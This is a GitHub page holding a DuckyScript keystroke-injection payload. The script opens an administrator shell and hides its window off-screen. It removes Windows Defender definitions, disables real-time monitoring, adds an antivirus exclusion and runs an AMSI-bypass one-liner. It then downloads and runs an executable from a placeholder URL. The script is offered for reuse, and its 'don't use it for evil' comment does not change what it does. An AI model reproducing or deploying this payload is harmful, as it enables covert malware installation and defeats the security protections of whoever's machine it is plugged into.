-
Notifications
You must be signed in to change notification settings - Fork 6
/
Copy pathScript.txt
68 lines (64 loc) · 1.5 KB
/
Script.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
REM Author: Quessts
REM The following script downloads and runs
REM executable files from the internet
REM replace <File Name> with the name of the exe
REM and replace <URl> with the URL link
REM this script also bypasses AntiVirus and
REM adds the file to the exclusions list
REM please give credit when sharing this script
REM and don't use it for evil :)
REM Three second delay before start
DELAY 3000
REM search for cmd
GUI r
DELAY 100
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 1000
REM Launch cmd as admin
ALT y
DELAY 2000
STRING cd %userprofile%
ENTER
DELAY 100
REM Hide screen
ALT SPACE
DELAY 1000
STRING m
DELAY 1000
DOWNARROW
REPEAT 100
ENTER
REM Disable antivirus
STRING "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All Set-MpPreference -DisableIOAVProtection $true
ENTER
DELAY 100
REM start powershell
STRING powershell
ENTER
DELAY 500
REM Add file to exclusions
STRING Set-MpPreference -DisableRealtimeMonitoring $true; Add-MpPreference -ExclusionPath "$env:TEMP/<File Name>"
ENTER
DELAY 100
STRING "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)"
ENTER
DELAY 100
REM Download file from URL and save to temp
STRING Invoke-WebRequest -Uri '<URL LINK>' -OutFile $env:TEMP/<File Name>
ENTER
DELAY 750
REM Change directory to temp
STRING cd $env:TEMP
ENTER
DELAY 100
REM Run file
STRING .\<File Name>
ENTER
DELAY 100
REM Exit powershell and cmd
STRING exit
ENTER
DELAY 500
STRING exit
ENTER